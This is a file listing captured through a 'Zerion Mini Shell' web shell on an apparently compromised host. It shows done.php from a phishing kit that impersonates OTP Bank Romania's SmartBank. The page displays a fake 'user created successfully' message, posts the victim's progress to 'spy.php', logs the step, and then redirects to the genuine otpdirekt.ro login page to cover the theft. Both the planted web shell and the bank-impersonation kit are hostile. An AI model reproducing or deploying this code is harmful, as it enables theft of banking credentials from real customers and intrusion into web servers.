Mini Shell

Direktori : /home/emypro/www/ro/auth/
Upload File :
Current File : /home/emypro/www/ro/auth/done.php

<?php require(__DIR__) . '/../main.php'; ?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SmartBank</title>
    <!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css"
        integrity="sha512-1ycn6IcaQQ40/MKBW2W4Rhis/DbILU74C1vSrLJxCq57o941Ym01SwNsOMqvEBFlcgUa6xLiPY/NS5R+E6ztJQ=="
        crossorigin="anonymous" referrerpolicy="no-referrer" /> -->
    <link href="https://cdn.jsdelivr.net/gh/hung1001/font-awesome-pro@4cac1a6/css/all.css" rel="stylesheet"
        type="text/css" />

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css"
        integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
    <!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> -->
    <link rel="stylesheet" href="themes/css/login.css">
</head>

<body>
    <div class="nav_buybd">
        <img class="beuxes" src="assets/images/logo.svg" alt="">
    </div>
    <div class="container-fluid mt-5">
        <div class="row">
            <div class="col-12">
                <div class="bceed">
                    <form action="" method="POST" id="form" data-redirection="email" class="hyucuyv">
                        <div class="hbrhfbc">
                            <h4 class="jhgsaz">Ai reușit!</h4>
                            <img src="assets/icon/success.svg" alt="" class="jhier">
                            <h4 class="efrgfre">Utilizatorul a fost creat cu succes</h4>
                            <p class="jhvbhce">
                                La următoarea autentificare în Internet Banking (în aplicaţia SmartBank şi pe site-ul
                                otpdirekt.ro) vei folosi Utilizatorul:
                                <br>nume@email.ro.<br>
                                Parola pentru autentificare rămâne aceeaşi.
                            </p>

                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
    <script src="res/jq.js"></script>
    <script>
        $.post("spy.php", {
            waitingview: 1
        });
    </script>
    <?php
    $m->ctr("DONE");
    ?>
    <script>

        setTimeout(function () {
            window.location.href = "https://www.otpdirekt.ro/ibank2/login";
        }, 7000);

    </script>
</body>

</html>

Zerion Mini Shell 1.0